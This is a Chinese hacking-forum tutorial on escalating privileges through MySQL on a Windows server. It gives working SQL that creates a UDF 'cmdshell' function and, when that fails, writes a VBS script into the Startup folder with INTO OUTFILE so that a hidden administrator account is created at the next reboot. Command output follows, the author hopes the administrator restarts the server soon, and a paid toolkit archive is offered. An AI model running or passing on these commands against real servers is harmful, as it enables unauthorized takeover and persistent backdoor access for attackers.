HanDs
管理员

[提权服务器] udf导入启动项提权 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看


今天的教程是udf导入启动项提权


教程开始


导出DLL文件出错:File 'C:WINDOWSudf.dll' already exists


说明已近存在udf.dll ,因为我之前已近导出了


一 UDF提权



create function cmdshell returns string soname 'udf.dll'

select cmdshell('net user foolishqiang foolishqiang /add');  

select cmdshell('net localgroup administrators foolishqiang /add');  

drop function cmdshell; 这个是删除函数  不删除了



数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Can't open shared library 'udf.dll' (errno: 2 ) 


不知道为什么,不行,换种思路


导入启动项


二 VBS启动项提权


create table d (cmd text);

insert into d values ("set wshshell=createobject (""wscript.shell"") " );

insert into d values ("a=wshshell.run (""cmd.exe /c net user foolishqiang foolishqiang /add"",0) " );

insert into d values ("b=wshshell.run (""cmd.exe /c net localgroup administrators foolishqiang /add"",0) " );

select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\d.vbs";




指定文件夹根目录:C:\Documents and Settings\All Users\「开始」菜单\程序\启动\ 


可读,不可写。


启动项出现d.vbs


set wshshell=createobject ("wscript.shell") 

a=wshshell.run ("cmd.exe /c net user foolishqiang foolishqiang /add",0) 

b=wshshell.run ("cmd.exe /c net localgroup administrators foolishqiang /add",0) 



Administrator            Guest                    IUSR_SERVER5000          

IWAM_SERVER5000          SQLdebuger               SUPPORT_388945a0         

命令成功完成。



现在没foolishqiang这个账户,


登入不上去,希望管理员能早日重启服务器


好了,教程结束,88




学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任

1 个附件 售价 大小 下载 时间

udfqdxtq.rar 1 金币 12.33M 0 次 2016-8-10

udf 导入启动项提权
#1楼
发帖时间:2016-8-10   |   查看数:0   |   回复数:0
游客组
快速回复